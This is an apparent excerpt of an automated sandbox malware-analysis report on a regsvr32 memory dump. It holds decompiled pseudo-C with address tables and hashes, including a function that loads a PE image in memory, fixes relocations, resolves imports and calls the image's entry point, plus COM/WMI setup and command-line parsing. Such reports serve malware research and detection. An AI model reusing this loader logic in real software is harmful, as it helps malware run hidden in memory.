                                                                                                                                                                                              0x042a51bf
                                                                                                                                                                                              0x042a5188
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a5113
                                                                                                                                                                                              0x042a511e
                                                                                                                                                                                              0x042a5124
                                                                                                                                                                                              0x042a5126
                                                                                                                                                                                              0x042a53b5
                                                                                                                                                                                              0x042a53b9
                                                                                                                                                                                              0x042a53be
                                                                                                                                                                                              0x042a53c0
                                                                                                                                                                                              0x042a53c6
                                                                                                                                                                                              0x042a53c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a5126

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1985475764-0
                                                                                                                                                                                              • Opcode ID: b49297445f8d9715323957abbf35b49934de3f5e28eed625b3e0e3f95a440690
                                                                                                                                                                                              • Instruction ID: 67f4b0936a237e58c199b73ba0157bd481857956129af016441ffafd92f42639
                                                                                                                                                                                              • Opcode Fuzzy Hash: b49297445f8d9715323957abbf35b49934de3f5e28eed625b3e0e3f95a440690
                                                                                                                                                                                              • Instruction Fuzzy Hash: B681DE71724301ABE714EB24E848B7FB3E5EFC4318F14492DED558B280EFB4B9958A81
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042ADE26 Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E042ADE26(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x42bc9a0);
						_t36 = E042A9A5A( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E042A8BF4( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















                                                                                                                                                                                              0x042ade2f
                                                                                                                                                                                              0x042ade36
                                                                                                                                                                                              0x042ade39
                                                                                                                                                                                              0x042ade46
                                                                                                                                                                                              0x042ade4c
                                                                                                                                                                                              0x042ade4f
                                                                                                                                                                                              0x042ade51
                                                                                                                                                                                              0x042ade56
                                                                                                                                                                                              0x042adf2e
                                                                                                                                                                                              0x042adf2e
                                                                                                                                                                                              0x042adf2e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ade5c
                                                                                                                                                                                              0x042ade5c
                                                                                                                                                                                              0x042ade5c
                                                                                                                                                                                              0x042ade5f
                                                                                                                                                                                              0x042ade65
                                                                                                                                                                                              0x042ade81
                                                                                                                                                                                              0x042ade88
                                                                                                                                                                                              0x042ade8e
                                                                                                                                                                                              0x042ade92
                                                                                                                                                                                              0x042adea6
                                                                                                                                                                                              0x042adea6
                                                                                                                                                                                              0x042adea9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ade94
                                                                                                                                                                                              0x042ade94
                                                                                                                                                                                              0x042ade99
                                                                                                                                                                                              0x042ade9d
                                                                                                                                                                                              0x042ade9d
                                                                                                                                                                                              0x042adea1
                                                                                                                                                                                              0x042adea2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ade94
                                                                                                                                                                                              0x042adeaa
                                                                                                                                                                                              0x042adeaa
                                                                                                                                                                                              0x042adead
                                                                                                                                                                                              0x042adeae
                                                                                                                                                                                              0x042adeb5
                                                                                                                                                                                              0x042adebf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042adec1
                                                                                                                                                                                              0x042adec7
                                                                                                                                                                                              0x042adecb
                                                                                                                                                                                              0x042adf24
                                                                                                                                                                                              0x042aded4
                                                                                                                                                                                              0x042adee1
                                                                                                                                                                                              0x042adee7
                                                                                                                                                                                              0x042adee9
                                                                                                                                                                                              0x042adef0
                                                                                                                                                                                              0x042adef6
                                                                                                                                                                                              0x042adefe
                                                                                                                                                                                              0x042adf06
                                                                                                                                                                                              0x042adf12
                                                                                                                                                                                              0x042adf18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042adf2a
                                                                                                                                                                                              0x042adeb7
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 042ADE3B
                                                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 042ADE46
                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 042ADE88
                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 042ADEE1
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 042ADF06
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000104), ref: 042ADF24
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1259063344-0
                                                                                                                                                                                              • Opcode ID: 0b225568d9da196e600305a2cc9887740f6375f5e072ee335ac5d99624e0ed25
                                                                                                                                                                                              • Instruction ID: 54089148813bbe634520ed6806bbe8181468be5c5b30c1827754d2ae60373ddb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b225568d9da196e600305a2cc9887740f6375f5e072ee335ac5d99624e0ed25
                                                                                                                                                                                              • Instruction Fuzzy Hash: AD312970F30117EBDF24AB58D948BEEB77AEF01311F104459ED05E2054E7B0AAA0CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AE656 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 042AE66A
                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 042AE672
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 042AE686
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 042AE701
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 042AE704
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 042AE709
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                                                                              • Opcode ID: e0a5969aa289e08e2779a7b94d78837f3902b00fd8fd85b01d2b1af47efbfe0d
                                                                                                                                                                                              • Instruction ID: b0f056c388106304ba4288097e87efc669fd2b8783be2209dc01356ff6df525e
                                                                                                                                                                                              • Opcode Fuzzy Hash: e0a5969aa289e08e2779a7b94d78837f3902b00fd8fd85b01d2b1af47efbfe0d
                                                                                                                                                                                              • Instruction Fuzzy Hash: F8212EB5A10218BFDB00DFA9CC88DAFBBBDEF48754B14445AF505E7240DA71AE01CBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042B3D66 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                                                              			E042B3D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































                                                                                                                                                                                              0x042b3d6f
                                                                                                                                                                                              0x042b3d7c
                                                                                                                                                                                              0x042b3d82
                                                                                                                                                                                              0x042b3d8b
                                                                                                                                                                                              0x042b3d8e
                                                                                                                                                                                              0x042b3d91
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b3e82
                                                                                                                                                                                              0x042b3e86
                                                                                                                                                                                              0x042b3e88
                                                                                                                                                                                              0x042b3e96
                                                                                                                                                                                              0x042b3fb4
                                                                                                                                                                                              0x042b3fb8
                                                                                                                                                                                              0x042b407d
                                                                                                                                                                                              0x042b4086
                                                                                                                                                                                              0x042b4089
                                                                                                                                                                                              0x042b408d
                                                                                                                                                                                              0x042b4093
                                                                                                                                                                                              0x042b409b
                                                                                                                                                                                              0x042b409b
                                                                                                                                                                                              0x042b40a3
                                                                                                                                                                                              0x042b40b1
                                                                                                                                                                                              0x042b40b4
                                                                                                                                                                                              0x042b40b8
                                                                                                                                                                                              0x042b40be
                                                                                                                                                                                              0x042b40ce
                                                                                                                                                                                              0x042b40f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b40fb
                                                                                                                                                                                              0x042b40d4
                                                                                                                                                                                              0x042b40e5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b40f3
                                                                                                                                                                                              0x042b40f7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b40f3
                                                                                                                                                                                              0x042b40e7
                                                                                                                                                                                              0x042b40eb
                                                                                                                                                                                              0x042b40f0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b40f0
                                                                                                                                                                                              0x042b40d6
                                                                                                                                                                                              0x042b40da
                                                                                                                                                                                              0x042b40dc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b40dc
                                                                                                                                                                                              0x042b40c0
                                                                                                                                                                                              0x042b40c4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b40c6
                                                                                                                                                                                              0x042b3fbe
                                                                                                                                                                                              0x042b3fc2
                                                                                                                                                                                              0x042b3fc4
                                                                                                                                                                                              0x042b3fd2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b3fd8
                                                                                                                                                                                              0x042b3fe1
                                                                                                                                                                                              0x042b3fef
                                                                                                                                                                                              0x042b3ffb
                                                                                                                                                                                              0x042b4007
                                                                                                                                                                                              0x042b4010
                                                                                                                                                                                              0x042b4013
                                                                                                                                                                                              0x042b4017
                                                                                                                                                                                              0x042b4019
                                                                                                                                                                                              0x042b4026
                                                                                                                                                                                              0x042b403a
                                                                                                                                                                                              0x042b4049
                                                                                                                                                                                              0x042b405a
                                                                                                                                                                                              0x042b4023
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b4023
                                                                                                                                                                                              0x042b405c
                                                                                                                                                                                              0x042b4060
                                                                                                                                                                                              0x042b4065
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b4065
                                                                                                                                                                                              0x042b4070
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b4072
                                                                                                                                                                                              0x042b4076
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b4078
                                                                                                                                                                                              0x042b3e9c
                                                                                                                                                                                              0x042b3ea5
                                                                                                                                                                                              0x042b3eb3
                                                                                                                                                                                              0x042b3eb6
                                                                                                                                                                                              0x042b3ed3
                                                                                                                                                                                              0x042b3eda
                                                                                                                                                                                              0x042b3eec
                                                                                                                                                                                              0x042b3eec
                                                                                                                                                                                              0x042b3ef3
                                                                                                                                                                                              0x042b3f03
                                                                                                                                                                                              0x042b3f1b
                                                                                                                                                                                              0x042b3f05
                                                                                                                                                                                              0x042b3f0d
                                                                                                                                                                                              0x042b3f0d
                                                                                                                                                                                              0x042b3f1e
                                                                                                                                                                                              0x042b3f22
                                                                                                                                                                                              0x042b3f32
                                                                                                                                                                                              0x042b3f55
                                                                                                                                                                                              0x042b3f67
                                                                                                                                                                                              0x042b3f34
                                                                                                                                                                                              0x042b3f48
                                                                                                                                                                                              0x042b3f48
                                                                                                                                                                                              0x042b3f71
                                                                                                                                                                                              0x042b3f8d
                                                                                                                                                                                              0x042b3f73
                                                                                                                                                                                              0x042b3f82
                                                                                                                                                                                              0x042b3f82
                                                                                                                                                                                              0x042b3f95
                                                                                                                                                                                              0x042b3f9e
                                                                                                                                                                                              0x042b3f9e
                                                                                                                                                                                              0x042b3fac
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b3ef5
                                                                                                                                                                                              0x042b3ef7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b3ef7
                                                                                                                                                                                              0x042b3ef3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b3eb6
                                                                                                                                                                                              0x042b3d99
                                                                                                                                                                                              0x042b3da7
                                                                                                                                                                                              0x042b3dac
                                                                                                                                                                                              0x042b3db7
                                                                                                                                                                                              0x042b3dba
                                                                                                                                                                                              0x042b3dbe
                                                                                                                                                                                              0x042b3dc0
                                                                                                                                                                                              0x042b3dd0
                                                                                                                                                                                              0x042b3dd9
                                                                                                                                                                                              0x042b3de2
                                                                                                                                                                                              0x042b3dea
                                                                                                                                                                                              0x042b3df3
                                                                                                                                                                                              0x042b3dfe
                                                                                                                                                                                              0x042b3e04
                                                                                                                                                                                              0x042b3e07
                                                                                                                                                                                              0x042b3e0a
                                                                                                                                                                                              0x042b3e11
                                                                                                                                                                                              0x042b3e18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b3e23
                                                                                                                                                                                              0x042b3e31
                                                                                                                                                                                              0x042b3e3c
                                                                                                                                                                                              0x042b3e46
                                                                                                                                                                                              0x042b3e5e
                                                                                                                                                                                              0x042b3e6b
                                                                                                                                                                                              0x042b3e6b
                                                                                                                                                                                              0x042b3e48
                                                                                                                                                                                              0x042b3e53
                                                                                                                                                                                              0x042b3e53
                                                                                                                                                                                              0x042b3e72
                                                                                                                                                                                              0x042b3e72
                                                                                                                                                                                              0x042b3e7a
                                                                                                                                                                                              0x042b3e7a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 042B3ECD
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 042B3EE6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 042B3F42
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 042B3F61
                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00000000), ref: 042B4052
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1872726118-0
                                                                                                                                                                                              • Opcode ID: b2395d976dd3d458be21c9d586503e162e690842e604e8cd1c26c0be6e9d1739
                                                                                                                                                                                              • Instruction ID: 702a7facbd967b7f3ecbaf8ba97c88e9222188fa3eb9af8fc77409fd092c773b
                                                                                                                                                                                              • Opcode Fuzzy Hash: b2395d976dd3d458be21c9d586503e162e690842e604e8cd1c26c0be6e9d1739
                                                                                                                                                                                              • Instruction Fuzzy Hash: 90E19174A2020ADFCB14DF98C984AEDBBB1FF08354F14855AE855EB352D774A981CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042B19A9 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                              • API String ID: 0-2132903582
                                                                                                                                                                                              • Opcode ID: 3725193fa63959a090cfd881e706ecb65941fe5a1622135111904f0ed6f58a07
                                                                                                                                                                                              • Instruction ID: 8503e2184c25dae0ddc05468861238da32e5a454b379d6cb673bae1d637341ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3725193fa63959a090cfd881e706ecb65941fe5a1622135111904f0ed6f58a07
                                                                                                                                                                                              • Instruction Fuzzy Hash: B741A271730106A7EB284EA89DB9BFA3A58DF013D4F180115FAD2E7240F261F9B0D6D1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AE400 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E042AE400(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x42bc868, 0, 1, 0x42bc878, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E042A8BDE(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                                                                                                              0x042ae40d
                                                                                                                                                                                              0x042ae410
                                                                                                                                                                                              0x042ae413
                                                                                                                                                                                              0x042ae424
                                                                                                                                                                                              0x042ae42a
                                                                                                                                                                                              0x042ae43b
                                                                                                                                                                                              0x042ae443
                                                                                                                                                                                              0x042ae494
                                                                                                                                                                                              0x042ae494
                                                                                                                                                                                              0x042ae499
                                                                                                                                                                                              0x042ae49e
                                                                                                                                                                                              0x042ae49e
                                                                                                                                                                                              0x042ae4a1
                                                                                                                                                                                              0x042ae4a6
                                                                                                                                                                                              0x042ae4ab
                                                                                                                                                                                              0x042ae4ab
                                                                                                                                                                                              0x042ae4ae
                                                                                                                                                                                              0x042ae445
                                                                                                                                                                                              0x042ae446
                                                                                                                                                                                              0x042ae44c
                                                                                                                                                                                              0x042ae45d
                                                                                                                                                                                              0x042ae462
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ae464
                                                                                                                                                                                              0x042ae471
                                                                                                                                                                                              0x042ae479
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ae47b
                                                                                                                                                                                              0x042ae47d
                                                                                                                                                                                              0x042ae485
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ae487
                                                                                                                                                                                              0x042ae48a
                                                                                                                                                                                              0x042ae490
                                                                                                                                                                                              0x042ae490
                                                                                                                                                                                              0x042ae485
                                                                                                                                                                                              0x042ae479
                                                                                                                                                                                              0x042ae462
                                                                                                                                                                                              0x042ae4b3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE413
                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE424
                                                                                                                                                                                              • CoCreateInstance.OLE32(042BC868,00000000,00000001,042BC878,?,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE43B
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 042AE446
                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE471
                                                                                                                                                                                                • Part of subcall function 042A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,042A959D,00000100,?,042A6507), ref: 042A8BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1610782348-0
                                                                                                                                                                                              • Opcode ID: f08e21ea886c00c904f988ab642501821b33211c2169a52e52b7ee400fe0f3e5
                                                                                                                                                                                              • Instruction ID: d6e699df033ee91c53e940d10e5108715dd908f942715c57753371dbcb7817d9
